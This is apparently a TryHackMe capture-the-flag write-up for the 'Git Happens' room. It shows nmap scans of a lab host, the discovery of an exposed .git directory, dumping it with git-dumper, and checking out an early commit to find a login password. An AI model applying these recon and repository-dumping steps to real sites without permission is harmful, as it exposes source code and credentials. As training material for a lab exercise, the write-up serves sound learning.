THM Writeup – Git Happens

THM Writeup – Git Happens

THM Writeup - Git Happens

Boss wanted me to create a prototype, so here it is! We even used something called “version control” that made deploying this really easy!

Room: Git Happens

Difficulty: Easy

Operating System: Linux

Author: hydragyrum

Can you find the password to the application?

Add IP address to your hosts file:

echo '10.10.42.122    git.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv git.thm

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 80 git.thm

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git: 
|   10.10.42.122:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!

Only port 80 is open and also nmap found git repository – so let’s start with web application then with repository.

Browse to http://git.thm/

web application login page

We could try some sql injection attacks, but I don’t think it’s going to be about sqli. The room’s name tells us we should look at git repository 😉

Browse to http://git.thm/.git/

git repository

At this point we need to find out how to grab whole repo to our disk – I had no clue so I googled how to dump git repository from a website:

dump git repo from web site search results

And a tool exactly for this purpose came up.

As per readme, install the git-dumper:

pip install git-dumper

Create a directory for the repository and run git-dumper:

mkdir gitroom
git-dumper http://git.thm/.git/ gitroom/

Go to the gitroom directory and check git commits:

root@ip-10-10-54-253:~# cd gitroom/ 
root@ip-10-10-54-253:~/gitroom# git log
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

    Update .gitlab-ci.yml

commit 77aab78e2624ec9400f9ed3f43a6f0c942eeb82d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:21:25 2020 +0200

    add gitlab-ci config to build docker file.

commit 2eb93ac3534155069a8ef59cb25b9c1971d5d199
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Fri Jul 24 00:08:38 2020 +0200

    setup dockerfile and setup defaults.

commit d6df4000639981d032f628af2b4d03b8eff31213
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:42:30 2020 +0200

    Make sure the css is standard-ish!

commit d954a99b96ff11c37a558a5d93ce52d0f3702a7d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:41:12 2020 +0200

    re-obfuscating the code to be really secure!

commit bc8054d9d95854d278359a432b6d97c27e24061d
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:37:32 2020 +0200

    Security says obfuscation isn't enough.
    
    They want me to use something called 'SHA-512'

commit e56eaa8e29b589976f33d76bc58a0c4dfb9315b1
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:25:52 2020 +0200

    Obfuscated the source code.
    
    Hopefully security will be happy!

commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

    Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

    Initial commit

We found an interesting commit which description is “Made the login page, boss!” – let’s explore it more.

Check what is inside that commit:

root@ip-10-10-54-253:~/gitroom# git checkout 395e087334d613d5e423cdf8f7be27196a360459
Note: checking out '395e087334d613d5e423cdf8f7be27196a360459'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 395e087 Made the login page, boss!

To execute this command successfully you must be outside of .git directory, e.g. in our case outside of gitroom/.git.

Now list all the files in the selected commit and then check index.html:

root@ip-10-10-54-253:~/gitroom# ls -lA
total 20
drwxr-xr-x 2 root root 4096 Feb  9 14:31 css
-rw-r--r-- 1 root root  677 Feb  9 14:31 dashboard.html
drwxr-xr-x 7 root root 4096 Feb  9 14:35 .git
-rw-r--r-- 1 root root 2667 Feb  9 14:31 index.html
-rw-r--r-- 1 root root   54 Feb  9 14:05 README.md
root@ip-10-10-54-253:~/gitroom# less index.html

And we have the super secret password…

Do you like this writeup? Check out other THM Writeups.

Comments are closed.